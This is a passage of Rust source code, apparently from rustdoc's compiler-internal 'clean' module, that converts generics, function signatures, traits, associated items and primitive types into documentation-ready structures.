        let name = cx.tcx.associated_item(self.item_def_id).ident.name.clean(cx);
        Type::QPath {
            name,
            self_type: box self.self_ty().clean(cx),
            trait_: box trait_,
        }
    }
}
/// The kind-specific data of a cleaned generic parameter: lifetimes carry
/// nothing extra, type parameters carry their bounds, default, and origin.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum GenericParamDefKind {
    Lifetime,
    Type {
        did: DefId,
        bounds: Vec<GenericBound>,
        default: Option<Type>,
        // `Some` when the parameter was synthesized by the compiler
        // (e.g. from `impl Trait`) rather than written by the user.
        synthetic: Option<hir::SyntheticTyParamKind>,
    },
}
/// A cleaned generic parameter (lifetime or type) with its rendered name.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct GenericParamDef {
    pub name: String,
    pub kind: GenericParamDefKind,
}
impl GenericParamDef {
    /// Whether this is a type parameter synthesized by the compiler (e.g.
    /// from `impl Trait`) rather than written by the user.
    pub fn is_synthetic_type_param(&self) -> bool {
        if let GenericParamDefKind::Type { ref synthetic, .. } = self.kind {
            synthetic.is_some()
        } else {
            false
        }
    }
}
impl<'tcx> Clean<GenericParamDef> for ty::GenericParamDef {
    fn clean(&self, cx: &DocContext) -> GenericParamDef {
        match self.kind {
            ty::GenericParamDefKind::Lifetime => GenericParamDef {
                name: self.name.to_string(),
                kind: GenericParamDefKind::Lifetime,
            },
            ty::GenericParamDefKind::Type { has_default, .. } => {
                // Record the external type param so cross-crate rendering
                // can refer back to it.
                cx.renderinfo.borrow_mut().external_typarams
                             .insert(self.def_id, self.name.clean(cx));
                let default = if has_default {
                    Some(cx.tcx.type_of(self.def_id).clean(cx))
                } else {
                    None
                };
                GenericParamDef {
                    name: self.name.clean(cx),
                    kind: GenericParamDefKind::Type {
                        did: self.def_id,
                        // Bounds are filled in later from the where-clauses.
                        bounds: vec![],
                        default,
                        synthetic: None,
                    },
                }
            }
        }
    }
}
impl Clean<GenericParamDef> for hir::GenericParam {
    fn clean(&self, cx: &DocContext) -> GenericParamDef {
        match self.kind {
            hir::GenericParamKind::Lifetime { .. } => {
                // Fold any outlives bounds into the rendered name,
                // e.g. `'a: 'b + 'c`.
                let name = if self.bounds.is_empty() {
                    self.name.ident().to_string()
                } else {
                    let bound_names: Vec<String> = self.bounds.iter().map(|bound| {
                        match bound {
                            hir::GenericBound::Outlives(lt) => lt.name.ident().to_string(),
                            _ => panic!(),
                        }
                    }).collect();
                    format!("{}: {}", self.name.ident(), bound_names.join(" + "))
                };
                GenericParamDef { name, kind: GenericParamDefKind::Lifetime }
            }
            hir::GenericParamKind::Type { ref default, synthetic, .. } => GenericParamDef {
                name: self.name.ident().name.clean(cx),
                kind: GenericParamDefKind::Type {
                    did: cx.tcx.hir.local_def_id(self.id),
                    bounds: self.bounds.clean(cx),
                    default: default.clean(cx),
                    synthetic,
                },
            },
        }
    }
}
// maybe use a Generic enum and use Vec<Generic>?
/// A cleaned set of generics: the parameter list plus the (possibly
/// synthesized) where-clause predicates.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Default, Hash)]
pub struct Generics {
    pub params: Vec<GenericParamDef>,
    pub where_predicates: Vec<WherePredicate>,
}
impl Clean<Generics> for hir::Generics {
    fn clean(&self, cx: &DocContext) -> Generics {
        // Synthetic type-parameters are inserted after normal ones.
        // In order for normal parameters to be able to refer to synthetic ones,
        // scan them first.
        fn is_impl_trait(param: &hir::GenericParam) -> bool {
            match param.kind {
                hir::GenericParamKind::Type { synthetic, .. } => {
                    synthetic == Some(hir::SyntheticTyParamKind::ImplTrait)
                }
                _ => false,
            }
        }

        // Clean the `impl Trait` params first and stash their bounds so that
        // later cleaning can substitute them back in.
        let impl_trait_params = self.params
            .iter()
            .filter(|param| is_impl_trait(param))
            .map(|param| {
                let param: GenericParamDef = param.clean(cx);
                match param.kind {
                    GenericParamDefKind::Lifetime => unreachable!(),
                    GenericParamDefKind::Type { did, ref bounds, .. } => {
                        cx.impl_trait_bounds.borrow_mut().insert(did, bounds.clone());
                    }
                }
                param
            })
            .collect::<Vec<_>>();

        let mut params = Vec::with_capacity(self.params.len());
        for p in self.params.iter().filter(|p| !is_impl_trait(p)) {
            let p = p.clean(cx);
            params.push(p);
        }
        params.extend(impl_trait_params);

        let mut generics = Generics {
            params,
            where_predicates: self.where_clause.predicates.clean(cx),
        };

        // Some duplicates are generated for ?Sized bounds between type params and where
        // predicates. The point in here is to move the bounds definitions from type params
        // to where predicates when such cases occur.
        for where_pred in &mut generics.where_predicates {
            match *where_pred {
                WherePredicate::BoundPredicate { ty: Generic(ref name), ref mut bounds } => {
                    if bounds.is_empty() {
                        for param in &mut generics.params {
                            match param.kind {
                                GenericParamDefKind::Lifetime => {}
                                GenericParamDefKind::Type { bounds: ref mut ty_bounds, .. } => {
                                    if &param.name == name {
                                        // Move the param's bounds onto the
                                        // (empty) where-predicate.
                                        mem::swap(bounds, ty_bounds);
                                        break
                                    }
                                }
                            }
                        }
                    }
                }
                _ => continue,
            }
        }
        generics
    }
}
impl<'a, 'tcx> Clean<Generics> for (&'a ty::Generics,
                                    &'a ty::GenericPredicates<'tcx>) {
    fn clean(&self, cx: &DocContext) -> Generics {
        use self::WherePredicate as WP;

        let (gens, preds) = *self;

        // Bounds in the type_params and lifetimes fields are repeated in the
        // predicates field (see rustc_typeck::collect::ty_generics), so remove
        // them. The implicit `Self` param is also dropped here.
        let stripped_typarams = gens.params.iter().filter_map(|param| match param.kind {
            ty::GenericParamDefKind::Lifetime => None,
            ty::GenericParamDefKind::Type { .. } => {
                if param.name == keywords::SelfType.name().as_str() {
                    assert_eq!(param.index, 0);
                    return None;
                }
                Some(param.clean(cx))
            }
        }).collect::<Vec<GenericParamDef>>();

        let mut where_predicates = preds.predicates.to_vec().clean(cx);

        // Type parameters have a Sized bound by default unless removed with
        // ?Sized. Scan through the predicates and mark any type parameter with
        // a Sized bound, removing the bounds as we find them.
        //
        // Note that associated types also have a sized bound by default, but we
        // don't actually know the set of associated types right here so that's
        // handled in cleaning associated types.
        let mut sized_params = FxHashSet();
        where_predicates.retain(|pred| {
            match *pred {
                WP::BoundPredicate { ty: Generic(ref g), ref bounds } => {
                    if bounds.iter().any(|b| b.is_sized_bound(cx)) {
                        sized_params.insert(g.clone());
                        false
                    } else {
                        true
                    }
                }
                _ => true,
            }
        });

        // Run through the type parameters again and insert a ?Sized
        // unbound for any we didn't find to be Sized.
        for tp in &stripped_typarams {
            if !sized_params.contains(&tp.name) {
                where_predicates.push(WP::BoundPredicate {
                    ty: Type::Generic(tp.name.clone()),
                    bounds: vec![GenericBound::maybe_sized(cx)],
                })
            }
        }

        // It would be nice to collect all of the bounds on a type and recombine
        // them if possible, to avoid e.g. `where T: Foo, T: Bar, T: Sized, T: 'a`
        // and instead see `where T: Foo + Bar + Sized + 'a`
        Generics {
            params: gens.params
                        .iter()
                        .flat_map(|param| match param.kind {
                            ty::GenericParamDefKind::Lifetime => Some(param.clean(cx)),
                            ty::GenericParamDefKind::Type { .. } => None,
                        }).chain(simplify::ty_params(stripped_typarams).into_iter())
                        .collect(),
            where_predicates: simplify::where_clauses(cx, where_predicates),
        }
    }
}
/// A cleaned method with a body: its generics, declaration, and function
/// header (constness, unsafety, ABI, asyncness).
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Method {
    pub generics: Generics,
    pub decl: FnDecl,
    pub header: hir::FnHeader,
}
impl<'a> Clean<Method> for (&'a hir::MethodSig, &'a hir::Generics, hir::BodyId) {
    fn clean(&self, cx: &DocContext) -> Method {
        let (sig, gens, body_id) = (self.0, self.1, self.2);
        // Generics and declaration are cleaned inside the same
        // `enter_impl_trait` scope so they see the same synthetic params.
        let (generics, decl) = enter_impl_trait(cx, || {
            (gens.clean(cx), (&*sig.decl, body_id).clean(cx))
        });
        Method {
            decl,
            generics,
            header: sig.header,
        }
    }
}
/// A cleaned required trait method (no body).
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct TyMethod {
    pub header: hir::FnHeader,
    pub decl: FnDecl,
    pub generics: Generics,
}
/// A cleaned free function.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Function {
    pub decl: FnDecl,
    pub generics: Generics,
    pub header: hir::FnHeader,
}
impl Clean<Item> for doctree::Function {
    fn clean(&self, cx: &DocContext) -> Item {
        // Generics and declaration are cleaned inside the same
        // `enter_impl_trait` scope so they see the same synthetic params.
        let (generics, decl) = enter_impl_trait(cx, || {
            (self.generics.clean(cx), (&self.decl, self.body).clean(cx))
        });
        Item {
            name: Some(self.name.clean(cx)),
            attrs: self.attrs.clean(cx),
            source: self.whence.clean(cx),
            visibility: self.vis.clean(cx),
            stability: self.stab.clean(cx),
            deprecation: self.depr.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.id),
            inner: FunctionItem(Function { decl, generics, header: self.header }),
        }
    }
}
/// A cleaned function signature: arguments, return type, and C-variadic flag.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct FnDecl {
    pub inputs: Arguments,
    pub output: FunctionRetTy,
    pub variadic: bool,
    pub attrs: Attributes,
}
impl FnDecl {
    /// Whether the first argument is named `self`.
    pub fn has_self(&self) -> bool {
        self.inputs.values.first().map_or(false, |arg| arg.name == "self")
    }

    /// The receiver's flavor, if the declaration has a `self` argument.
    pub fn self_type(&self) -> Option<SelfTy> {
        self.inputs.values.first().and_then(|v| v.to_self())
    }
}
/// The cleaned argument list of a function declaration.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct Arguments {
    pub values: Vec<Argument>,
}
impl<'a> Clean<Arguments> for (&'a [hir::Ty], &'a [ast::Ident]) {
    /// Pairs argument types with the given identifiers; missing or empty
    /// names fall back to `_`.
    fn clean(&self, cx: &DocContext) -> Arguments {
        let (types, idents) = *self;
        let values = types.iter().enumerate().map(|(i, ty)| {
            let mut name = idents.get(i)
                .map_or(String::new(), |ident| ident.to_string());
            if name.is_empty() {
                name = "_".to_string();
            }
            Argument {
                name,
                type_: ty.clean(cx),
            }
        }).collect();
        Arguments { values }
    }
}
impl<'a> Clean<Arguments> for (&'a [hir::Ty], hir::BodyId) {
    /// Pairs argument types with names derived from the body's argument
    /// patterns (e.g. the `x` of `fn f(x: u32)`).
    fn clean(&self, cx: &DocContext) -> Arguments {
        let body = cx.tcx.hir.body(self.1);
        let values = self.0.iter().enumerate().map(|(i, ty)| Argument {
            name: name_from_pat(&body.arguments[i].pat),
            type_: ty.clean(cx),
        }).collect();
        Arguments { values }
    }
}
/// Cleans a HIR function declaration, delegating argument naming to whatever
/// extra data `A` carries (an ident slice or a body id).
impl<'a, A: Copy> Clean<FnDecl> for (&'a hir::FnDecl, A)
    where (&'a [hir::Ty], A): Clean<Arguments>
{
    fn clean(&self, cx: &DocContext) -> FnDecl {
        let (decl, extra) = *self;
        FnDecl {
            inputs: (&decl.inputs[..], extra).clean(cx),
            output: decl.output.clean(cx),
            variadic: decl.variadic,
            attrs: Attributes::default(),
        }
    }
}
/// Cleans a type-level function signature (used for cross-crate items).
impl<'a, 'tcx> Clean<FnDecl> for (DefId, ty::PolyFnSig<'tcx>) {
    fn clean(&self, cx: &DocContext) -> FnDecl {
        let (did, sig) = *self;
        // For local items the name list is left empty, so every argument
        // falls back to "" below; only non-local items query `fn_arg_names`.
        let mut names = if cx.tcx.hir.as_local_node_id(did).is_some() {
            vec![].into_iter()
        } else {
            cx.tcx.fn_arg_names(did).into_iter()
        };
        FnDecl {
            output: Return(sig.skip_binder().output().clean(cx)),
            attrs: Attributes::default(),
            variadic: sig.skip_binder().variadic,
            inputs: Arguments {
                // Pair each input type with the next available name, if any.
                values: sig.skip_binder().inputs().iter().map(|t| {
                    Argument {
                        type_: t.clean(cx),
                        name: names.next().map_or("".to_string(), |name| name.to_string()),
                    }
                }).collect(),
            },
        }
    }
}
/// A single named function argument.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct Argument {
    pub type_: Type,
    pub name: String,
}
/// How a method takes its receiver: by value, by (optionally named,
/// optionally mutable) reference, or with an explicitly written type.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Debug)]
pub enum SelfTy {
    SelfValue,
    SelfBorrowed(Option<Lifetime>, Mutability),
    SelfExplicit(Type),
}
impl Argument {
    /// Classifies this argument as a `self` receiver, or `None` if it is
    /// not named `self` at all.
    pub fn to_self(&self) -> Option<SelfTy> {
        if self.name != "self" {
            return None;
        }
        if self.type_.is_self_type() {
            return Some(SelfValue);
        }
        // `&Self` / `&mut Self` become a borrowed receiver; anything else
        // (e.g. `self: Box<Self>`) keeps its explicit type.
        if let BorrowedRef { ref lifetime, mutability, ref type_ } = self.type_ {
            if type_.is_self_type() {
                return Some(SelfBorrowed(lifetime.clone(), mutability));
            }
        }
        Some(SelfExplicit(self.type_.clone()))
    }
}
/// A function's return type: an explicit `-> T` or the implicit unit return.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum FunctionRetTy {
    Return(Type),
    DefaultReturn,
}
impl Clean<FunctionRetTy> for hir::FunctionRetTy {
    /// Maps the HIR return type onto the cleaned representation one-to-one.
    fn clean(&self, cx: &DocContext) -> FunctionRetTy {
        match *self {
            hir::DefaultReturn(..) => DefaultReturn,
            hir::Return(ref ty) => Return(ty.clean(cx)),
        }
    }
}
impl GetDefId for FunctionRetTy {
    /// Only an explicit return type can refer to a definition; the implicit
    /// unit return never does.
    fn def_id(&self) -> Option<DefId> {
        if let Return(ref ty) = *self {
            ty.def_id()
        } else {
            None
        }
    }
}
/// A cleaned trait definition.
#[derive(Clone, RustcEncodable, RustcDecodable, Debug)]
pub struct Trait {
    // NOTE(review): `auto` and `is_auto` coexist and appear to carry the same
    // information — confirm whether one is vestigial before relying on either.
    pub auto: bool,
    pub unsafety: hir::Unsafety,
    pub items: Vec<Item>,
    pub generics: Generics,
    pub bounds: Vec<GenericBound>,
    // Whether the trait carries the `#[doc(spotlight)]` attribute.
    pub is_spotlight: bool,
    pub is_auto: bool,
}
impl Clean<Item> for doctree::Trait {
    /// Cleans a trait definition into an `Item`, recording whether it carries
    /// the `#[doc(spotlight)]` flag.
    fn clean(&self, cx: &DocContext) -> Item {
        let attrs = self.attrs.clean(cx);
        let is_spotlight = attrs.has_doc_flag("spotlight");
        Item {
            name: Some(self.name.clean(cx)),
            // Field-init shorthand (was the redundant `attrs: attrs`).
            attrs,
            source: self.whence.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.id),
            visibility: self.vis.clean(cx),
            stability: self.stab.clean(cx),
            deprecation: self.depr.clean(cx),
            inner: TraitItem(Trait {
                auto: self.is_auto.clean(cx),
                unsafety: self.unsafety,
                items: self.items.clean(cx),
                generics: self.generics.clean(cx),
                bounds: self.bounds.clean(cx),
                is_spotlight,
                is_auto: self.is_auto.clean(cx),
            }),
        }
    }
}
impl Clean<bool> for hir::IsAuto {
    /// Collapses the two-variant HIR flag into a plain boolean.
    fn clean(&self, _: &DocContext) -> bool {
        match *self {
            hir::IsAuto::No => false,
            hir::IsAuto::Yes => true,
        }
    }
}
impl Clean<Type> for hir::TraitRef {
    /// Cleans the trait reference's path and resolves it to a `Type`.
    fn clean(&self, cx: &DocContext) -> Type {
        let path = self.path.clean(cx);
        resolve_type(cx, path, self.ref_id)
    }
}
impl Clean<PolyTrait> for hir::PolyTraitRef {
    /// Cleans a possibly higher-ranked trait reference (`for<'a> Trait<'a>`).
    fn clean(&self, cx: &DocContext) -> PolyTrait {
        let trait_ = self.trait_ref.clean(cx);
        let generic_params = self.bound_generic_params.clean(cx);
        PolyTrait { trait_, generic_params }
    }
}
impl Clean<Item> for hir::TraitItem {
    /// Cleans one item inside a trait declaration: an associated const, a
    /// provided method (with body), a required method (names only), or an
    /// associated type.
    fn clean(&self, cx: &DocContext) -> Item {
        let inner = match self.node {
            hir::TraitItemKind::Const(ref ty, default) => {
                AssociatedConstItem(ty.clean(cx),
                                    default.map(|e| print_const_expr(cx, e)))
            }
            hir::TraitItemKind::Method(ref sig, hir::TraitMethod::Provided(body)) => {
                MethodItem((sig, &self.generics, body).clean(cx))
            }
            hir::TraitItemKind::Method(ref sig, hir::TraitMethod::Required(ref names)) => {
                // No body is available, so argument names come from the
                // ident list rather than from body patterns.
                let (generics, decl) = enter_impl_trait(cx, || {
                    (self.generics.clean(cx), (&*sig.decl, &names[..]).clean(cx))
                });
                TyMethodItem(TyMethod {
                    header: sig.header,
                    decl,
                    generics,
                })
            }
            hir::TraitItemKind::Type(ref bounds, ref default) => {
                AssociatedTypeItem(bounds.clean(cx), default.clean(cx))
            }
        };
        Item {
            name: Some(self.ident.name.clean(cx)),
            attrs: self.attrs.clean(cx),
            source: self.span.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.id),
            // Trait items carry no visibility of their own.
            visibility: None,
            stability: get_stability(cx, cx.tcx.hir.local_def_id(self.id)),
            deprecation: get_deprecation(cx, cx.tcx.hir.local_def_id(self.id)),
            inner,
        }
    }
}
impl Clean<Item> for hir::ImplItem {
    /// Cleans one item inside an `impl` block: an associated const (always
    /// with a value), a method (always with a body), or an associated type.
    fn clean(&self, cx: &DocContext) -> Item {
        let inner = match self.node {
            hir::ImplItemKind::Const(ref ty, expr) => {
                AssociatedConstItem(ty.clean(cx),
                                    Some(print_const_expr(cx, expr)))
            }
            hir::ImplItemKind::Method(ref sig, body) => {
                MethodItem((sig, &self.generics, body).clean(cx))
            }
            // Associated types in impls are surfaced as typedef items.
            hir::ImplItemKind::Type(ref ty) => TypedefItem(Typedef {
                type_: ty.clean(cx),
                generics: Generics::default(),
            }, true),
        };
        Item {
            name: Some(self.ident.name.clean(cx)),
            source: self.span.clean(cx),
            attrs: self.attrs.clean(cx),
            def_id: cx.tcx.hir.local_def_id(self.id),
            visibility: self.vis.clean(cx),
            stability: get_stability(cx, cx.tcx.hir.local_def_id(self.id)),
            deprecation: get_deprecation(cx, cx.tcx.hir.local_def_id(self.id)),
            inner,
        }
    }
}
impl<'tcx> Clean<Item> for ty::AssociatedItem {
    /// Cleans a type-level associated item (const, method, or type), mostly
    /// used for items pulled in from other crates.
    fn clean(&self, cx: &DocContext) -> Item {
        let inner = match self.kind {
            ty::AssociatedKind::Const => {
                let ty = cx.tcx.type_of(self.def_id);
                // Only print a value when the const actually has one.
                let default = if self.defaultness.has_value() {
                    Some(inline::print_inlined_const(cx, self.def_id))
                } else {
                    None
                };
                AssociatedConstItem(ty.clean(cx), default)
            }
            ty::AssociatedKind::Method => {
                let generics = (cx.tcx.generics_of(self.def_id),
                                &cx.tcx.predicates_of(self.def_id)).clean(cx);
                let sig = cx.tcx.fn_sig(self.def_id);
                let mut decl = (self.def_id, sig).clean(cx);
                // Rewrite the receiver's type back to the literal `Self` so
                // it renders as `self` / `&self` instead of the concrete type.
                if self.method_has_self_argument {
                    let self_ty = match self.container {
                        ty::ImplContainer(def_id) => {
                            cx.tcx.type_of(def_id)
                        }
                        ty::TraitContainer(_) => cx.tcx.mk_self_type()
                    };
                    let self_arg_ty = *sig.input(0).skip_binder();
                    if self_arg_ty == self_ty {
                        decl.inputs.values[0].type_ = Generic(String::from("Self"));
                    } else if let ty::TyRef(_, ty, _) = self_arg_ty.sty {
                        // `&Self` / `&mut Self`: rewrite the referent only.
                        if ty == self_ty {
                            match decl.inputs.values[0].type_ {
                                BorrowedRef{ref mut type_, ..} => {
                                    **type_ = Generic(String::from("Self"))
                                }
                                _ => unreachable!(),
                            }
                        }
                    }
                }
                // "Provided" = has a body: always true inside an impl, and
                // true in a trait only for defaulted methods.
                let provided = match self.container {
                    ty::ImplContainer(_) => true,
                    ty::TraitContainer(_) => self.defaultness.has_value()
                };
                if provided {
                    let constness = if cx.tcx.is_const_fn(self.def_id) {
                        hir::Constness::Const
                    } else {
                        hir::Constness::NotConst
                    };
                    MethodItem(Method {
                        generics,
                        decl,
                        header: hir::FnHeader {
                            unsafety: sig.unsafety(),
                            abi: sig.abi(),
                            constness,
                            asyncness: hir::IsAsync::NotAsync,
                        }
                    })
                } else {
                    TyMethodItem(TyMethod {
                        generics,
                        decl,
                        header: hir::FnHeader {
                            unsafety: sig.unsafety(),
                            abi: sig.abi(),
                            constness: hir::Constness::NotConst,
                            asyncness: hir::IsAsync::NotAsync,
                        }
                    })
                }
            }
            ty::AssociatedKind::Type => {
                let my_name = self.ident.name.clean(cx);
                if let ty::TraitContainer(did) = self.container {
                    // When loading a cross-crate associated type, the bounds for this type
                    // are actually located on the trait/impl itself, so we need to load
                    // all of the generics from there and then look for bounds that are
                    // applied to this associated type in question.
                    let predicates = cx.tcx.predicates_of(did);
                    let generics = (cx.tcx.generics_of(did), &predicates).clean(cx);
                    // Keep only where-predicates of the shape
                    // `<Self as ThisTrait>::my_name: Bounds`.
                    let mut bounds = generics.where_predicates.iter().filter_map(|pred| {
                        let (name, self_type, trait_, bounds) = match *pred {
                            WherePredicate::BoundPredicate {
                                ty: QPath { ref name, ref self_type, ref trait_ },
                                ref bounds
                            } => (name, self_type, trait_, bounds),
                            _ => return None,
                        };
                        if *name != my_name { return None }
                        match **trait_ {
                            ResolvedPath { did, .. } if did == self.container.id() => {}
                            _ => return None,
                        }
                        match **self_type {
                            Generic(ref s) if *s == "Self" => {}
                            _ => return None,
                        }
                        Some(bounds)
                    }).flat_map(|i| i.iter().cloned()).collect::<Vec<_>>();
                    // Our Sized/?Sized bound didn't get handled when creating the generics
                    // because we didn't actually get our whole set of bounds until just now
                    // (some of them may have come from the trait). If we do have a sized
                    // bound, we remove it, and if we don't then we add the `?Sized` bound
                    // at the end.
                    match bounds.iter().position(|b| b.is_sized_bound(cx)) {
                        Some(i) => { bounds.remove(i); }
                        None => bounds.push(GenericBound::maybe_sized(cx)),
                    }
                    let ty = if self.defaultness.has_value() {
                        Some(cx.tcx.type_of(self.def_id))
                    } else {
                        None
                    };
                    AssociatedTypeItem(bounds, ty.clean(cx))
                } else {
                    // In an impl, the associated type is just a typedef.
                    TypedefItem(Typedef {
                        type_: cx.tcx.type_of(self.def_id).clean(cx),
                        generics: Generics {
                            params: Vec::new(),
                            where_predicates: Vec::new(),
                        },
                    }, true)
                }
            }
        };
        // Trait members inherit the trait's visibility; impl members keep
        // their own.
        let visibility = match self.container {
            ty::ImplContainer(_) => self.vis.clean(cx),
            ty::TraitContainer(_) => None,
        };
        Item {
            name: Some(self.ident.name.clean(cx)),
            visibility,
            stability: get_stability(cx, self.def_id),
            deprecation: get_deprecation(cx, self.def_id),
            def_id: self.def_id,
            attrs: inline::load_attrs(cx, self.def_id),
            source: cx.tcx.def_span(self.def_id).clean(cx),
            inner,
        }
    }
}
/// A trait reference, which may have higher ranked lifetimes.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub struct PolyTrait {
    pub trait_: Type,
    /// The `for<'a, ...>` binders, if any.
    pub generic_params: Vec<GenericParamDef>,
}
/// A representation of a Type suitable for hyperlinking purposes. Ideally one can get the original
/// type out of the AST/TyCtxt given one of these, if more information is needed. Most importantly
/// it does not preserve mutability or boxes.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Debug, Hash)]
pub enum Type {
    /// structs/enums/traits (most that'd be an hir::TyPath)
    ResolvedPath {
        path: Path,
        typarams: Option<Vec<GenericBound>>,
        did: DefId,
        /// true if is a `T::Name` path for associated types
        is_generic: bool,
    },
    /// For parameterized types, so the consumer of the JSON don't go
    /// looking for types which don't exist anywhere.
    Generic(String),
    /// Primitives are the fixed-size numeric types (plus int/usize/float), char,
    /// arrays, slices, and tuples.
    Primitive(PrimitiveType),
    /// extern "ABI" fn
    BareFunction(Box<BareFunctionDecl>),
    Tuple(Vec<Type>),
    /// `[T]`
    Slice(Box<Type>),
    /// `[T; N]`, with the length already rendered as a string.
    Array(Box<Type>, String),
    /// The never type `!`.
    Never,
    Unique(Box<Type>),
    /// `*const T` / `*mut T`.
    RawPointer(Mutability, Box<Type>),
    /// `&'a T` / `&'a mut T`.
    BorrowedRef {
        lifetime: Option<Lifetime>,
        mutability: Mutability,
        type_: Box<Type>,
    },
    // <Type as Trait>::Name
    QPath {
        name: String,
        self_type: Box<Type>,
        trait_: Box<Type>
    },
    // _
    Infer,
    // impl TraitA+TraitB
    ImplTrait(Vec<GenericBound>),
}
/// The primitive types that get their own documentation pages. Beyond the
/// numeric/char/bool/str types this includes structural "primitives" such as
/// slices, arrays, tuples, pointers, references, and fn pointers.
#[derive(Clone, RustcEncodable, RustcDecodable, PartialEq, Eq, Hash, Copy, Debug)]
pub enum PrimitiveType {
    Isize, I8, I16, I32, I64, I128,
    Usize, U8, U16, U32, U64, U128,
    F32, F64,
    Char,
    Bool,
    Str,
    Slice,
    Array,
    Tuple,
    Unit,
    RawPointer,
    Reference,
    Fn,
    Never,
}
/// The broad category of an item a path can resolve to.
#[derive(Clone, RustcEncodable, RustcDecodable, Copy, Debug)]
pub enum TypeKind {
    Enum,
    Function,
    Module,
    Const,
    Static,
    Struct,
    Union,
    Trait,
    Variant,
    Typedef,
    Foreign,
    Macro,
}
/// Types that may point back at a definition (e.g. for linking).
pub trait GetDefId {
    fn def_id(&self) -> Option<DefId>;
}
impl<T: GetDefId> GetDefId for Option<T> {
    /// Delegates to the contained value; `None` has no definition.
    fn def_id(&self) -> Option<DefId> {
        match *self {
            Some(ref inner) => inner.def_id(),
            None => None,
        }
    }
}
impl Type {
    /// Returns the primitive this type renders as, if any, looking through a
    /// single `&`-reference (so `&[T]` is still the slice primitive).
    pub fn primitive_type(&self) -> Option<PrimitiveType> {
        match *self {
            Primitive(p) | BorrowedRef { type_: box Primitive(p), ..} => Some(p),
            Slice(..) | BorrowedRef { type_: box Slice(..), .. } => Some(PrimitiveType::Slice),
            Array(..) | BorrowedRef { type_: box Array(..), .. } => Some(PrimitiveType::Array),
            // The empty tuple is the `unit` primitive, not `tuple`.
            Tuple(ref tys) => if tys.is_empty() {
                Some(PrimitiveType::Unit)
            } else {
                Some(PrimitiveType::Tuple)
            },
            RawPointer(..) => Some(PrimitiveType::RawPointer),
            BorrowedRef { type_: box Generic(..), .. } => Some(PrimitiveType::Reference),
            BareFunction(..) => Some(PrimitiveType::Fn),
            Never => Some(PrimitiveType::Never),
            _ => None,
        }
    }
    /// Whether this is a resolved path flagged as generic (`T::Name`-style).
    pub fn is_generic(&self) -> bool {
        match *self {
            ResolvedPath { is_generic, .. } => is_generic,
            _ => false,
        }
    }
    /// True only for the literal `Self` type parameter.
    pub fn is_self_type(&self) -> bool {
        match *self {
            Generic(ref name) => name == "Self",
            _ => false
        }
    }
    /// The angle-bracketed type arguments of the final path segment, if any.
    pub fn generics(&self) -> Option<&[Type]> {
        match *self {
            ResolvedPath { ref path, .. } => {
                path.segments.last().and_then(|seg| {
                    if let GenericArgs::AngleBracketed { ref types, .. } = seg.args {
                        Some(&**types)
                    } else {
                        None
                    }
                })
            }
            _ => None,
        }
    }
}
impl GetDefId for Type {
    /// The definition a type links to: the resolved path's `DefId`, or the
    /// registered location of the primitive it renders as.
    fn def_id(&self) -> Option<DefId> {
        match *self {
            ResolvedPath { did, .. } => Some(did),
            // Primitive pages are looked up in the global render cache.
            Primitive(p) => ::html::render::cache().primitive_locations.get(&p).cloned(),
            // `&T` where T is generic links to the `reference` primitive;
            // otherwise follow the referent.
            BorrowedRef { type_: box Generic(..), .. } =>
                Primitive(PrimitiveType::Reference).def_id(),
            BorrowedRef { ref type_, .. } => type_.def_id(),
            Tuple(ref tys) => if tys.is_empty() {
                Primitive(PrimitiveType::Unit).def_id()
            } else {
                Primitive(PrimitiveType::Tuple).def_id()
            },
            BareFunction(..) => Primitive(PrimitiveType::Fn).def_id(),
            Never => Primitive(PrimitiveType::Never).def_id(),
            Slice(..) => Primitive(PrimitiveType::Slice).def_id(),
            Array(..) => Primitive(PrimitiveType::Array).def_id(),
            RawPointer(..) => Primitive(PrimitiveType::RawPointer).def_id(),
            // Qualified paths link to their self type.
            QPath { ref self_type, .. } => self_type.def_id(),
            _ => None,
        }
    }
}
impl PrimitiveType {
    /// Parses a primitive's canonical name; `None` for anything unrecognized.
    fn from_str(s: &str) -> Option<PrimitiveType> {
        use self::PrimitiveType::*;
        Some(match s {
            "isize" => Isize,
            "i8" => I8,
            "i16" => I16,
            "i32" => I32,
            "i64" => I64,
            "i128" => I128,
            "usize" => Usize,
            "u8" => U8,
            "u16" => U16,
            "u32" => U32,
            "u64" => U64,
            "u128" => U128,
            "bool" => Bool,
            "char" => Char,
            "str" => Str,
            "f32" => F32,
            "f64" => F64,
            "array" => Array,
            "slice" => Slice,
            "tuple" => Tuple,
            "unit" => Unit,
            "pointer" => RawPointer,
            "reference" => Reference,
            "fn" => Fn,
            "never" => Never,
            _ => return None,
        })
    }
    /// The canonical lowercase name (inverse of `from_str`).
    pub fn as_str(&self) -> &'static str {
        match *self {
            PrimitiveType::Isize => "isize",
            PrimitiveType::I8 => "i8",
            PrimitiveType::I16 => "i16",
            PrimitiveType::I32 => "i32",
            PrimitiveType::I64 => "i64",
            PrimitiveType::I128 => "i128",
            PrimitiveType::Usize => "usize",
            PrimitiveType::U8 => "u8",
            PrimitiveType::U16 => "u16",
            PrimitiveType::U32 => "u32",
            PrimitiveType::U64 => "u64",
            PrimitiveType::U128 => "u128",
            PrimitiveType::F32 => "f32",
            PrimitiveType::F64 => "f64",
            PrimitiveType::Str => "str",
            PrimitiveType::Bool => "bool",
            PrimitiveType::Char => "char",
            PrimitiveType::Array => "array",
            PrimitiveType::Slice => "slice",
            PrimitiveType::Tuple => "tuple",
